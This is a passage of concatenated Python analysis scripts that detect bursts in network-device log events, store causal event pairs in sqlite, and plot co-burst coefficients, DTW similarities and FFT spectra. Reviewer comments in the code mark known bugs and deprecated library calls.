            burst_list = np.delete(burst_list, np.where(burst_list == 0)[0], 0)
            # Optionally drop ranges whose gaps exceed 1 min (disabled)
            # burst_list = check_interval(burst_list, time_list)
            # Build the burst containment tree
            root_node = Node(None, 0, 0, 0, 0) # root node
            for lv, st, en in burst_list:
                # reset per burst row
                parent_node = root_node
                isadded = 0
                burst_cnt = len([z for z in time_list if st <= z <= en])
                new_node = Node(None, st, en, lv, burst_cnt)
                while isadded == 0:
                    for child_node in parent_node.children: # compare against each child in turn
                        if child_node.st <= new_node.st \
                                and child_node.en >= new_node.en: # containment check
                            # Contained and the child is a leaf:
                            # attach here and stop.
                            if child_node.children == []:
                                child_node.add_node(new_node)
                                isadded = 1
                                break
                            else:
                                # Contained but the child has children:
                                # descend and compare again.
                                parent_node = child_node
                                break
                        else: # not contained: try the next child
                            pass
                    else: # contained by no child: attach to current parent
                        parent_node.add_node(new_node)
                        isadded = 1
                # Tree complete, rooted at root_node.
                # Display the burst tree (debug, disabled)
                # print(ind, 'result')
                # show_burst_tree(root_node)
                # Tree traversal (disabled experiment)
                # parent_node = root_node
                # result_node = []
                # while True:
                #     for cur_node in parent_node.children:
                #         if cur_node.children == [] :
                #             result_node.append(cur_node)
                #
                #         # when cur_node's density is 2x that of every child
                #         elif any(cur_node.dens > x.dens * 2
                #                  for x in cur_node.children) :
                #             result_node.append(cur_node)
                #         else : # some child has more than half the density
        # Append this group's result if any bursts remain.
        # NOTE(review): if the first group has <=30 events, burst_list /
        # root_node are undefined here (NameError); later sparse groups
        # silently reuse the previous group's values — confirm intent.
        if len(burst_list) != 0:
            # Record the first-layer children's summary rows.
            burst_result.append((ind,
                                 [z.value() for z in root_node.children]))
    return burst_result
# Pretty-print the burst tree, indenting one tab per depth level.
def show_burst_tree(parent_node):
    print('\t' * parent_node.depth, end='')
    print('[',
          parent_node.lv,
          parent_node.st,
          parent_node.en,
          parent_node.cnt,
          parent_node.dens(),
          ']')
    for child in parent_node.children:
        show_burst_tree(child)
# Filter burst ranges using the inter-arrival gaps of one group's time
# list: keep a range only if its largest gap is <= 2 min and fewer than
# half of its gaps exceed 1 min.
def check_interval(burst_range, group_time_list):
    if burst_range == []:
        return burst_range
    kept = []
    for level, start, end in burst_range:
        gaps = [b - a for a, b in zip(group_time_list[:-1],
                                      group_time_list[1:])
                if start <= a <= end and start <= b <= end]
        if max(gaps) > 60 * 2:  # largest gap beyond 2 minutes
            print('interval check hit', level, start, end)
            continue
        over_minute = sum(n for gap, n in collections.Counter(gaps).items()
                          if gap > 60)
        if over_minute / len(gaps) < 0.5:
            kept.append([level, start, end])
    return kept
# List the event dump file names stored under dumps/<day>/.
def get_dumpname(day):
    listing = subprocess.check_output(['ls', 'dumps/{0}'.format(day)])
    return listing.decode('utf-8')[:-1].split("\n")
if __name__ == '__main__':
    # One burst-detection pass per (day, event dump) pair; results land
    # in burst_result/<day>/<day>_<dump>.
    days = subprocess.check_output(['ls', 'dumps']).decode('utf-8')[:-1].split('\n')
    for day in days:
        print(day)
        day_date = datetime.datetime.strptime(day, "%Y%m%d").date()
        for DUMP_NAME in get_dumpname(day):
            with open('dumps/' + day + '/' + DUMP_NAME, "rb") as f:
                obj = pickle.load(f, encoding="bytes")
            if len(obj) == 0:
                print(day, DUMP_NAME, '\tno data')
                continue
            # Seconds-of-day for timestamps that actually fall on `day`.
            time_list = sorted(x.hour*3600 + x.minute*60 + x.second
                               for x in obj if x.date() == day_date)
            # Nudge duplicates forward by 0.01 s so offsets are unique.
            prev = -1
            for idx, t in enumerate(time_list):
                if prev == t:
                    time_list[idx] = round(time_list[idx-1] + 0.01, 3)
                else:
                    prev = t
            burst_result = m_burst_detect({day: time_list}, 4)
            out_path = 'burst_result/' + day + '/' + day + '_' + DUMP_NAME
            with open(out_path, 'wb') as g:
                if burst_result != []:
                    pickle.dump((DUMP_NAME, burst_result[0][0], burst_result[0][1]), g)
                else:
                    # No bursts: record only (dump name, day).
                    pickle.dump((DUMP_NAME, day), g)
--- FILE SEPARATOR ---
#!/usr/bin/python
import numpy as np
import pandas as pd
import datetime
import search_burst as sb
import plot_day
import pickle
import search_burst as sb
import sqlite3
'''
burst - noburstを探す
'''
# Number of log entries recorded for event dump DUMP_NAME on day DATE.
def cnt_logs(DUMP_NAME,DATE):
    entries = sb.open_dump('dumps/' + str(DATE) + '/' + DUMP_NAME)
    return len(entries)
def get_eday(evp):
    """Dates ('YYYYMMDD') on which a causal edge exists between the two
    events of *evp*, in either direction.

    evp: pair of '<gid>_<host>' event names. Uses the module-global
    sqlite3 cursor ``cur`` created in __main__.
    """
    # maxsplit=1 keeps hosts containing '_' intact (the old unbounded
    # split scrambled the positional argument list in that case).
    src_id, src_host = evp[0].split("_", 1)
    dst_id, dst_host = evp[1].split("_", 1)
    # Parameterized placeholders instead of str.format: no quoting /
    # injection issues with unusual host names.
    query = ('select date from date where pairID in('
             'select pairID from event where '
             '(srcID=? and srcHost=? and dstID=? and dstHost=?) or '
             '(srcID=? and srcHost=? and dstID=? and dstHost=?));')
    params = (int(src_id), src_host, int(dst_id), dst_host,
              int(dst_id), dst_host, int(src_id), src_host)
    cur.execute(query, params)
    # Dates are stored as 'YYYY-MM-DD'; strip the dashes.
    return ["".join(row[0].split("-")) for row in cur.fetchall()]
if __name__ == "__main__":
    # Find (burst, no-burst) pairs: connected events that do NOT co-burst,
    # where only one side bursts on a day the edge exists.
    dbname = 's4causality.db'
    conn = sqlite3.connect(dbname)
    cur = conn.cursor()  # module-level cursor used by get_eday()
    # All known edges, deduplicated as unordered '<id>_<host>' pairs.
    cur.execute('''select srcID,srcHost,dstID,dstHost from event''')
    edge = cur.fetchall()
    edge = [sorted((str(e[0])+"_"+e[1],str(e[2])+"_"+e[3])) for e in edge]
    edge = [e[0]+"."+e[1] for e in edge]
    edge = list(set(edge))
    edge = [set(e.split(".")) for e in edge]
    print(len(edge))
    # Co-bursting pairs, as sets for order-insensitive comparison.
    co_burst = sb.open_dump('co_prob_df')
    co_burst = list(co_burst['EvPair'].values)
    co_burst = [set(x) for x in co_burst]
    burst = sb.open_dump('burst_df')
    # Events that burst on at least one day.
    burst_ev = [x for x in burst.columns if len(burst[x].dropna()) != 0]
    burst_noburst = []
    for ep in edge:
        if ep not in co_burst:
            # NOTE(review): list(set) ordering is hash-dependent, so which
            # element lands in ep[0] vs ep[1] is arbitrary — confirm that
            # both orientations being appended below compensates for this.
            ep = list(ep)
            if ep[0] in burst_ev:
                burst_noburst.append(ep)
            if ep[1] in burst_ev:
                burst_noburst.append(ep[::-1])
    result = []
    for evp in burst_noburst:
        # Burst days of the bursting side, normalized to 'YYYYMMDD'.
        bday = burst[evp[0]].dropna().index.values
        bday = [str(x).split('T')[0].replace("-","") for x in bday]
        eday = get_eday(evp)
        if len(set(bday) & set(eday)) != 0:
            anddays = list(set(bday) & set(eday))
            days = []
            # Keep only days where the non-bursting side logged anything.
            for andday in anddays:
                if cnt_logs(evp[1],andday):
                    days.append(andday)
                else:
                    continue
            result.append((evp,days))
    with open('partial_burst','wb') as f:
        pickle.dump(result,f)
    conn.close()
    exit()
--- FILE SEPARATOR ---
import pickle
import datetime
import sys
import glob
import collections
import pandas as pd
import numpy as np
import search_burst as sb
'''
バースト結果をdfにする
burst_result/*/* -> burst_df[index = date, colmuns = events]
'''
def burst2get_data(burst_file):
    """Parse a textual burst-result file into {date: [(start, end), ...]}.

    Lines beginning with '(' carry a date tuple like '(2012, 1, 2)';
    lines beginning with '[' carry a burst row whose 2nd/3rd comma-
    separated fields are the start/end offsets.
    """
    # get_data = collections.defaultdict(lambda: 0)
    # NOTE(review): this loads a dump literally named 'burst_file'
    # instead of using the *burst_file* argument (or the defaultdict
    # above) — looks like leftover debugging; confirm before relying on
    # this function (it is not called anywhere in this file).
    get_data = sb.open_dump('burst_file')
    for line in open(burst_file,"r"):
        if line[0] == '(':
            # '(2012, 1, 2)' -> '20120102' (zero-padded month/day).
            get_date = "".join([a.strip().zfill(2) for a in line[1:-2].split(",")])
            get_data[get_date] = []
        elif line.strip()[0] == "[":
            st = line.strip()[1:-2].split(",")[1].strip()
            en = line.strip()[1:-2].split(",")[2].strip()
            get_data[get_date].append((float(st),float(en)))
    return get_data
def create_burst_df():
    """Collect the per-day burst dumps under burst_result/*/* into one
    DataFrame indexed by date (2012-01-01..2013-03-31) with one column
    per event name.
    """
    files = glob.glob('burst_result/*/*')
    # Event name is everything after the leading '<day>_' of the file name.
    evs = sorted(list(set(["_".join(fi.split('/')[-1].split("_")[1:]) for fi in files])))
    burst_df = pd.DataFrame(index=pd.date_range('20120101','20130331'), columns=evs)
    for fi in files:
        event_name = "_".join(fi.split('/')[-1].split('_')[1:])
        print(fi)
        try: # some bursts are detected: dump unpacks as (event, day, data)
            ev,day,data = sb.open_dump(fi)
        # Narrowed from bare `except:` so SystemExit / KeyboardInterrupt
        # are no longer swallowed; a no-burst dump (only (event, day))
        # still falls through here.
        except Exception: # no bursts are detected
            continue
        if event_name != ev:
            # File name and dump payload disagree: skip rather than
            # attribute bursts to the wrong event.
            print('event name error')
            print(event_name,ev,day,data)
            continue
        else:
            d = pd.to_datetime(day)
            burst_df.loc[d,ev] = data
    return burst_df
# def search_day(burst_dict):
# for date in pd.date_range('20120301','20130331'):
# date = date.date()
#
# event_list = []
# for event in burst_dict:
# if burst_dict[event][date] != 0:
# event_list
if __name__ == "__main__":
    # Build the burst DataFrame and persist it for the other scripts.
    df = create_burst_df()
    with open('burst_df', 'wb') as dump_out:
        pickle.dump(df, dump_out)
    # search_day(burst_dict)
--- FILE SEPARATOR ---
#!/usr/bin/python
# coding: UTF-8
'''
coburst, edgeプロット
'''
import collections
import sys
import numpy as np
import matplotlib.pyplot as plt
import pybursts
import datetime
import matplotlib.dates as mdates
import pickle
import search_burst as sb
# Scatter data: Jaccard/Simpson coefficients (scaled by 1e5 for the
# log-scale plot) for all co-burst pairs and for pairs with a known edge.
co_prob_df = sb.open_dump('co_prob_df')
co_edge_df = sb.open_dump('rp_edge_coburst')
xj = co_prob_df['x']
yj = co_prob_df['y_jaccard'] * (10 ** 5 )
xs = co_prob_df['x']
ys = co_prob_df['y_simpson'] * (10 ** 5 )
xej = co_edge_df['x']
yej = co_edge_df['y_jaccard'] * (10 ** 5 )
xes = co_edge_df['x']
yes = co_edge_df['y_simpson'] * (10 ** 5 )
# Highlight pairs linking a '10_*' event with an '11_*' event.
# BUG FIX: the prefix tests were joined with `or`, which matched any
# pair merely containing one of the prefixes; use `and` within each
# direction, mirroring the identical selection later in this script.
df_bool = [False]*co_prob_df.shape[0]
for i in [x for x in co_prob_df['EvPair'] if (x[0][:3]=='10_' and x[1][:3]=='11_') or (x[0][:3]=='11_' and x[1][:3]=='10_')]:
    df_bool |= co_prob_df['EvPair']==i
x1 = co_prob_df[df_bool]['x']
y1j = co_prob_df[df_bool]['y_jaccard'] * (10 ** 5 )
y1s = co_prob_df[df_bool]['y_simpson'] * (10 ** 5 )
# Figure 1: log-scale scatter of the (1e5-scaled) coefficients; one
# output file per coefficient kind.
for i in [0,1]:
    kind = ['jaccard','simpson'][i]
    fig = plt.figure(figsize=(10,6))
    ax = fig.add_subplot(111)
    fig.subplots_adjust(top=0.95, bottom=0.15, left=0.15, right=0.9)
    # Background: all co-burst pairs.
    y = [yj,ys][i]
    x = [xj,xs][i]
    plt.scatter(x,y, marker='.', c=None, color='gray', label='no causality')
    y = [y1j,y1s][i]
    x = x1
    # plt.scatter(x,y, marker='.', c=None, color='blue', label='"Show interface" command')
    # edge plot
    y = [yej,yes][i]
    x = [xej,xes][i]
    plt.scatter(x,y, marker='o', c=None, color='red', label='causality')
    plt.yscale("log")
    plt.xticks(fontsize='18')
    # Values were pre-scaled by 1e5, so relabel 10^1..10^5 as 10^-4..1.0.
    plt.yticks([10 ** i for i in range(1,6)],
               ['$10^{-4}$','$10^{-3}$','$10^{-2}$','$10^{-1}$','1.0'],
               fontsize='25')
    plt.ylim(1., 10. ** 5 + 10 ** 4)
    plt.grid()
    plt.xlabel(r'$|A \cup B|$', fontsize='23')
    ax.xaxis.set_label_coords(0.5, -0.13)
    if i==0:
        ax.set_ylabel(r'$J(A,B)$', fontsize='23')
    else:
        ax.set_ylabel(r'$S(A,B)$', fontsize='23')
    ax.yaxis.set_label_coords(-0.15, 0.5)
    plt.legend(prop={'size':20},loc='lower left')
    # plt.savefig('{0}_edge.png'.format(kind))
    plt.savefig('{0}_edge.eps'.format(kind))
# Unscaled coefficients for the second (linear-axis) figure.
xj = co_prob_df['x']
yj = co_prob_df['y_jaccard']
xs = co_prob_df['x']
ys = co_prob_df['y_simpson']
xej = co_edge_df['x']
yej = co_edge_df['y_jaccard']
xes = co_edge_df['x']
yes = co_edge_df['y_simpson']
# '10_*'-'11_*' pairs ("show interface" command).
df_bool = [False]*co_prob_df.shape[0]
for i in [x for x in co_prob_df['EvPair'] if (x[0][:3]=='10_' and x[1][:3]=='11_') or (x[0][:3]=='11_' and x[1][:3]=='10_')]:
    df_bool |= co_prob_df['EvPair']==i
x1 = co_prob_df[df_bool]['x']
y1j = co_prob_df[df_bool]['y_jaccard']
y1s = co_prob_df[df_bool]['y_simpson']
# '176_*'-'401_*' pairs ("MPLS path/bypath up").
df_bool = [False]*co_prob_df.shape[0]
for i in [x for x in co_prob_df['EvPair'] if (x[0][:4]=='176_' and x[1][:4]=='401_') or (x[0][:4]=='401_' and x[1][:4]=='176_')]:
    df_bool |= co_prob_df['EvPair']==i
x2 = co_prob_df[df_bool]['x']
y2j = co_prob_df[df_bool]['y_jaccard']
y2s = co_prob_df[df_bool]['y_simpson']
# '135_*'-'376_*' pairs ("MPLS path/bypath down").
# BUG FIX: unlike the two selections above, this one joined the prefix
# tests with `or`, selecting any pair containing either prefix; use
# `and` within each direction for consistency.
df_bool = [False]*co_prob_df.shape[0]
for i in [x for x in co_prob_df['EvPair'] if (x[0][:4]=='135_' and x[1][:4]=='376_') or (x[0][:4]=='376_' and x[1][:4]=='135_')]:
    df_bool |= co_prob_df['EvPair']==i
x3 = co_prob_df[df_bool]['x']
y3j = co_prob_df[df_bool]['y_jaccard']
y3s = co_prob_df[df_bool]['y_simpson']
# Figure 2: linear-scale scatter with the three labeled event families
# highlighted; saved as PNG, one file per coefficient kind.
for i in [0,1]:
    kind = ['jaccard','simpson'][i]
    fig = plt.figure(figsize=(10,6))
    ax = fig.add_subplot(111)
    fig.subplots_adjust(top=0.95, bottom=0.15, left=0.15, right=0.9)
    # edge plot
    y = [yej,yes][i]
    x = [xej,xes][i]
    plt.scatter(x,y, marker='o', c=None, color='red', label='causality')
    y = [yj,ys][i]
    x = [xj,xs][i]
    plt.scatter(x,y, marker='.', c=None, color='gray', label='no causality')
    # The three highlighted families prepared above.
    y1=[y1j,y1s][i]
    y2=[y2j,y2s][i]
    y3=[y3j,y3s][i]
    plt.scatter(x1,y1, marker='.', c=None, color='blue', label='"show interface" cmd')
    plt.scatter(x2,y2, marker='.', c=None, color='green', label='"MPLS path/bypath up"')
    plt.scatter(x3,y3, marker='.', c=None, color='orange', label='"MPLS path/bypath down"')
    plt.yticks(fontsize='25')
    plt.xticks(fontsize='18')
    # plt.yticks([i*0.1 for i in range(10)])
    # plt.ylim(0.1,1.02)
    plt.xlim(0,100)
    plt.grid()
    plt.xlabel(r'$|A \cup B|$', fontsize='23')
    ax.xaxis.set_label_coords(0.5, -0.13)
    if i==0:
        ax.set_ylabel(r'$J(A,B)$', fontsize='23')
    else:
        ax.set_ylabel(r'$S(A,B)$', fontsize='23')
    ax.yaxis.set_label_coords(-0.15, 0.5)
    # plt.legend(prop={'size':8},loc='upper right')
    # plt.legend(bbox_to_anchor=(1.00, 1), loc=2, borderaxespad=0.)
    plt.savefig('{0}_edge_01.png'.format(kind))
    # plt.savefig('{0}_edge.eps'.format(kind))
--- FILE SEPARATOR ---
import sqlite3
import numpy as np
import pandas as pd
if __name__ == "__main__":
    # Parse the textual edge-analysis output into an event table and a
    # per-edge date table, then load both into sqlite.
    with open("rp_edge_result",'r') as f:
        all_data=[i.strip() for i in f.readlines()]
    event_df = pd.DataFrame(columns=['srcID','srcHost','dstID','dstHost','direction','date'])
    date_df = pd.DataFrame(columns=['edgeID','date'])
    lt_df = pd.DataFrame(columns=['ltid','lt'])
    i = 0
    line = all_data
    # Stateful line scan: each 'dst>' line completes one record using the
    # date/direction/src fields seen on earlier lines.
    while i<len(all_data):
        if 'term : ' in line[i]:
            date = line[i].split()[2]
        elif 'undirected' in line[i]:
            direc = 0
        elif 'directed' in line[i]:
            direc = 1
        elif 'src>' in line[i]:
            srcID = line[i].split()[2]
            srcHost = line[i].split()[6][:-1]
        elif 'dst>' in line[i]:
            dstID = line[i].split()[2]
            dstHost = line[i].split()[6][:-1]
            # NOTE(review): DataFrame.append was removed in pandas 2.0;
            # this script needs an older pandas (or pd.concat) to run.
            event_df = event_df.append(pd.Series([srcID,srcHost,dstID,dstHost,direc,date],index=event_df.columns),ignore_index=True)
        i+=1
    dbname = 's4causality.db'
    conn = sqlite3.connect(dbname)
    cur = conn.cursor()
    cur.execute('''create table event (pairID integer primary key, srcID int, srcHost txt, dstID int, dstHost txt, direction int)''')
    # NOTE(review): .ix was removed from pandas long ago; .iloc[:, :5] is
    # the positional equivalent here. SQL is also built with str.format —
    # acceptable for this trusted one-shot import, but parameterized
    # queries would be safer.
    for row in event_df.ix[:,:5].drop_duplicates().iterrows():
        cur.execute('''insert into event(srcID, srcHost, dstID, dstHost, direction) values({0[0]},"{0[1]}",{0[2]},"{0[3]}",{0[4]})'''.format(row[1].values[:5]))
    cur.execute('''create table date (id integer primary key, pairID integer, date text)''')
    for row in event_df.iterrows():
        # Look up the pairID assigned above, then record each edge date.
        cur.execute('''select pairID from event where srcID={0[0]} and srcHost="{0[1]}" and dstID={0[2]} and dstHost="{0[3]}" and direction={0[4]}'''.format(row[1].values[:5]))
        pairID = cur.fetchall()[0][0]
        cur.execute('''insert into date(pairID, date) values({0},"{1}")'''.format(pairID, row[1].values[-1]))
    conn.commit()
    conn.close()
--- FILE SEPARATOR ---
import sqlite3
import numpy as np
import pandas as pd
if __name__ == "__main__":
    # Build a (log-template id, template text) table from the textual
    # edge-analysis output: each 'src>'/'dst>' header line is followed by
    # the template string on the next line.
    with open("rp_edge_result",'r') as f:
        line=[i.strip() for i in f.readlines()]

    lt_df = pd.DataFrame(columns=['ltid','lt'])
    i = 0
    while i<len(line):
        if 'src>' in line[i]:
            ltID = line[i].split()[2]
            i+=1
            lt = line[i]
            # BUG FIX: mirror the dst> branch below. `ltID in
            # lt_df['ltid']` tested the Series *index* rather than the
            # values, and `Series != scalar` cannot be used directly in
            # an `if` (ambiguous truth value).
            if ltID in lt_df['ltid'].values:
                # The same template id seen twice must carry identical text.
                if (lt_df[lt_df['ltid'] == ltID]['lt'].values != lt)[0]:
                    print('error');exit()
            else:
                # NOTE(review): DataFrame.append needs pandas < 2.0.
                lt_df = lt_df.append(pd.Series([ltID,lt],index=lt_df.columns),ignore_index=True)
        elif 'dst>' in line[i]:
            ltID = line[i].split()[2]
            i+=1
            lt = line[i]
            if ltID in lt_df['ltid'].values:
                if (lt_df[lt_df['ltid'] == ltID]['lt'].values != lt)[0]:
                    print('error');exit()
            else:
                lt_df = lt_df.append(pd.Series([ltID,lt],index=lt_df.columns),ignore_index=True)
        i+=1
--- FILE SEPARATOR ---
# -*- coding: utf-8 -*-
import numpy as np
import search_burst as sb
import sqlite3
import collections
import datetime
import pickle
def dtw_distance(ts_a, ts_b, d=lambda x, y: abs(x-y), window=0):
    """Dynamic-time-warping distance between two sequences.

    d is the local cost function; window (<= 0 means unconstrained)
    limits how far the alignment may stray from the diagonal.
    """
    if window <= 0:
        window = max(len(ts_a), len(ts_b))
    n = len(ts_a)
    m = len(ts_b)
    cost = np.empty((n, m))
    dist = np.empty((n, m))
    cost[0][0] = dist[0][0] = d(ts_a[0], ts_b[0])
    # First column / first row accumulate straight down / across.
    for i in range(1, n):
        cost[i][0] = d(ts_a[i], ts_b[0])
        dist[i][0] = dist[i-1, 0] + cost[i, 0]
    for j in range(1, m):
        cost[0][j] = d(ts_a[0], ts_b[j])
        dist[0][j] = dist[0, j-1] + cost[0, j]
    # Interior cells within the diagonal band.
    for i in range(1, n):
        lo = max(1, i - window)
        hi = min(m, i + window)
        for j in range(lo, hi):
            cost[i][j] = d(ts_a[i], ts_b[j])
            dist[i][j] = cost[i][j] + min(dist[i-1][j],
                                          dist[i][j-1],
                                          dist[i-1][j-1])
    return dist[n-1][m-1]
def get_eday(evp):
    """Dates ('YYYYMMDD') on which a causal edge exists between the two
    events of *evp*, in either direction.

    evp: pair of '<gid>_<host>' event names. Uses the module-global
    sqlite3 cursor ``cur`` created in __main__.
    """
    # maxsplit=1 keeps hosts containing '_' intact (the old unbounded
    # split scrambled the positional argument list in that case).
    src_id, src_host = evp[0].split("_", 1)
    dst_id, dst_host = evp[1].split("_", 1)
    # Parameterized placeholders instead of str.format: no quoting /
    # injection issues with unusual host names.
    query = ('select date from date where pairID in('
             'select pairID from event where '
             '(srcID=? and srcHost=? and dstID=? and dstHost=?) or '
             '(srcID=? and srcHost=? and dstID=? and dstHost=?));')
    params = (int(src_id), src_host, int(dst_id), dst_host,
              int(dst_id), dst_host, int(src_id), src_host)
    cur.execute(query, params)
    # Dates are stored as 'YYYY-MM-DD'; strip the dashes.
    return ["".join(row[0].split("-")) for row in cur.fetchall()]
# Load the raw datetime list for event DUMP_NAME on day DATE.
def get_log(DUMP_NAME,DATE):
    return sb.open_dump('dumps/' + str(DATE) + '/' + DUMP_NAME)
# Cumulative-arrival curve for one event's datetimes, normalized to 1.0:
# row 0 holds unique seconds-of-day (ascending), row 1 the running count.
def vect(ev):
    seconds = [t.hour*3600 + t.minute*60 + t.second for t in sorted(set(ev))]
    counts = [0]
    for _, n in sorted(collections.Counter(ev).items(), key=lambda z: z[0]):
        counts.append(counts[-1] + n)
    cum = np.array(counts[1:])
    cum = cum / np.max(cum)
    return np.array([np.array(seconds), cum])
def check_synm(evp,anddays):
    """Score waveform similarity of the two events of *evp* on each day
    in *anddays* via DTW over their cumulative arrival curves.

    Returns [(evp, day, dtw_distance), ...].

    Fix: removed a leftover hard-coded debug print for the
    '117_tokyo-dc-rm'/'116_tokyo-dc-rm' pair and two unused locals.
    """
    res = []
    for day in anddays:
        ev1 = get_log(evp[0], day)
        ev2 = get_log(evp[1], day)
        vev1 = vect(ev1)
        vev2 = vect(ev2)
        # 2-D DTW over (time, normalized count) points.
        dtw = dtw_distance(vev1.T, vev2.T, lambda x, y: np.linalg.norm(x-y))
        # dtw = dtw_distance(vev1[0],vev2[0])
        res.append((evp, day, dtw))
    return res
if __name__ == "__main__":
    # For every edge-co-burst pair, find days on which both events burst
    # AND the edge exists, then score waveform similarity with DTW.
    dbname = 's4causality.db'
    conn = sqlite3.connect(dbname)
    cur = conn.cursor()  # module-level cursor used by get_eday()
    edge_burst = sb.open_dump('rp_edge_coburst')
    burst = sb.open_dump('burst_df')
    # Events with at least one burst day (computed but not used below).
    burst_ev = [x for x in burst.columns if len(burst[x].dropna()) != 0]
    result = []
    for evp in edge_burst['EvPair']:
        # Burst days per event, normalized to 'YYYYMMDD'.
        bday1 = burst[evp[0]].dropna().index.values
        bday1 = [str(x).split('T')[0].replace("-","") for x in bday1]
        bday2 = burst[evp[1]].dropna().index.values
        bday2 = [str(x).split('T')[0].replace("-","") for x in bday2]
        bday = list(set(bday1) & set(bday2))
        eday = get_eday(evp)
        if len(set(bday) & set(eday)) != 0:
            anddays = list(set(bday) & set(eday))
            res = check_synm(evp,anddays)
            result.append(res)
    print(result)
    with open('edge_dtw_xxy','wb') as f:
        pickle.dump(result,f)
--- FILE SEPARATOR ---
import sqlite3
import numpy as np
import pandas as pd
import search_burst as sb
import pickle
# Build the SQL that fetches every date on which an edge exists between
# the two (id, host) endpoints, in either direction.
def search_pair_query(id1,host1,id2,host2):
    template = 'select date from date where pairID in(select pairID from event where (srcID={0} and srcHost="{1}" and dstID={2} and dstHost="{3}") or (srcID={2} and srcHost="{3}" and dstID={0} and dstHost="{1}"));'
    return template.format(id1, host1, id2, host2)
if __name__ == "__main__":
    # Restrict the co-burst table to pairs that also have a causal edge
    # recorded in the sqlite DB; dump the filtered frame.
    co_prob_df = sb.open_dump('co_prob_df')
    dbname = 's4causality.db'
    conn = sqlite3.connect(dbname)
    cur = conn.cursor()
    edge_coburst_pair = []
    for row in co_prob_df['EvPair'].values:
        # Event names are '<gid>_<host>'.
        id1,host1 = row[0].split('_')
        id2,host2 = row[1].split('_')
        q = search_pair_query(id1,host1,id2,host2)
        cur.execute('''{}'''.format(q))
        q_result = cur.fetchall()
        # Any returned date means an edge exists for this pair.
        if len(q_result) != 0 :
            edge_coburst_pair.append(row)
        else:
            pass
    # Boolean mask selecting the rows whose EvPair matched.
    edge_coburst_index = pd.Series([False]*co_prob_df.shape[0],index=co_prob_df.index)
    for i in edge_coburst_pair:
        edge_coburst_index |= co_prob_df['EvPair']==i
    with open('rp_edge_coburst','wb') as f:
        pickle.dump(co_prob_df[edge_coburst_index],f)
    # (leftover from the table-building script, disabled)
    # cur.execute('''create table date (id integer primary key, pairID integer, date text)''')
    # for row in event_df.iterrows():
    #     cur.execute('''select pairID from event where srcID={0[0]} and srcHost="{0[1]}" and dstID={0[2]} and dstHost="{0[3]}" and direction={0[4]}'''.format(row[1].values[:5]))
    #     pairID = cur.fetchall()[0][0]
    #     cur.execute('''insert into date(pairID, date) values({0},"{1}")'''.format(pairID, row[1].values[-1]))
    #
    # conn.commit()
    # conn.close()
--- FILE SEPARATOR ---
import pickle
import datetime
import sys
import glob
import search_burst as sb
'''
event別dumpファイルをhostごとに集約
python event_agg.py prefix
prefix以下が、
prefix/0000-0499/hoge.dump
'''
# Merge the per-event dumps of each day into one per-host dump under
# dumps_host/<day>/<day>_<host>.
days = [p.split('/')[-1] for p in glob.glob('dumps/*')]
for day in days:
    hosts = set([p.split('_')[-1] for p in glob.glob('dumps/{0}/*'.format(day))])
    for host in hosts:
        merged = []
        for fi in glob.glob('dumps/{0}/*_{1}'.format(day, host)):
            merged.extend(sb.open_dump(fi))
        with open('dumps_host/{0}/{1}'.format(day, day + '_' + host), 'wb') as f:
            pickle.dump(merged, f)
# # files = glob.glob('dump_files/0000-0499/*_tokyo-dc-rm.dump') # ワイルドカードが使用可能
# files = glob.glob('{0}/*-*/*'.format(PREFIX)) # ワイルドカードが使用可能
#
# host_list = []
# for fi in files:
# host_list.append(fi.split('/')[-1].split('.')[0].split('_')[1])
#
# print(set(host_list),len(set(host_list)))
# #
# # with open("host_list.txt","w") as f:
# # for i in set(host_list):
# # f.write(str(i))
# # f.write("\n")
# #
# # exit()
#
#
# for host in set(host_list):
#
# # パス内の全ての"指定パス+ファイル名"と"指定パス+ディレクトリ名"を要素とするリストを返す
# files = glob.glob('{0}/*-*/*_{1}.dump'.format(PREFIX,host)) # ワイルドカードが使用可能
#
# all_event = []
#
# for fi in files:
# with open(fi,"rb") as f:
# obj = pickle.load(f, encoding="bytes")
#
# # all_num += len(obj)
# all_event.extend(obj)
#
# with open(host + '.dump','wb') as f:
# pickle.dump(all_event,f)
--- FILE SEPARATOR ---
# -*- coding: utf-8 -*-
from scipy import arange, hamming, sin, pi
from scipy.fftpack import fft, ifft, fftfreq
import matplotlib.pyplot as plt
import search_burst as sb
import numpy as np
import pandas as pd
import sys
import datetime
# Spectrum of one event's daily arrival pattern: an impulse train with a
# spike at each log timestamp (seconds-of-day), windowed and FFT'd.
event = sb.open_dump(sys.argv[1])
day = sys.argv[2]  # target day as 'YYYYMMDD'
ev_year = int(day[:4])
ev_month = int(day[4:6])
ev_day = int(day[6:8])
ev_date = datetime.date(ev_year,ev_month,ev_day)
plot_data = [row.time() for row in event if row.date() == ev_date]
ev_data = [row.hour*3600 + row.minute*60 + row.second for row in plot_data]
fs = 1 # Sampling rate
L = 2**16 # Signal length
# Impulse train: amplitude 10 at each second that saw a log entry.
x = [10. if i in ev_data else 0. for i in range(L)]
# test data
# x = [10. if i%3600 == 0 else 0. for i in range(L)]
# # make a 440 Hz sine wave
# sine_440 = sin(2. * pi * arange(L) * 440. / fs)
# # make a 600 Hz sine wave
# sine_600 = 2 * sin(2. * pi * arange(L) * 600. / fs)
# # make an 800 Hz sine wave
# sine_800 = 3 * sin(2. * pi * arange(L) * 800. / fs)
#
# # sum them all
# sig = sine_440 + sine_600 + sine_800
#
# print(sig);exit()
# Window function.
# NOTE(review): `hamming` comes from `from scipy import ...` at the top
# of this file; those top-level re-exports were removed in modern SciPy —
# confirm the pinned version, or switch to numpy.hamming.
win = hamming(L)
# # Fourier transform
# spectrum_nw = fft(sig) # without window
# spectrum = fft(sig * win) # with window
# half_spectrum_nw = abs(spectrum_nw[: L / 2 + 1])
# half_spectrum = abs(spectrum[: L / 2 + 1])
spectrum = fft(x * win)
freq = fftfreq(L,fs)
# Positive frequencies only, DC bin dropped.
half_spectrum = abs(spectrum[1:int(L / 2)])
# # inverse Fourier transform
# resyn_sig = ifft(spectrum)
# resyn_sig /= win
# Render: input signal on top, spectrum below.
fig = plt.figure(figsize=(10,10))
fig.add_subplot(211)
plt.plot(x)
plt.xlim([0, L])
plt.title("1. Input signal", fontsize = 20)
fig.add_subplot(212)
# plt.plot(half_spectrum)
plt.plot(freq[1:int(L/2)], half_spectrum)
plt.xlim([0, 10**(-3)])
# plt.xscale('log')
plt.title("2. Spectrum (no window)", fontsize = 20)
plt.savefig('fft.png')
--- FILE SEPARATOR ---
import pickle
import sqlite3
import datetime
import sys
DUMP_FILE = sys.argv[1]
# BUG FIX: pickle files must be opened in binary mode; text mode makes
# pickle.load fail (it requires a bytes stream).
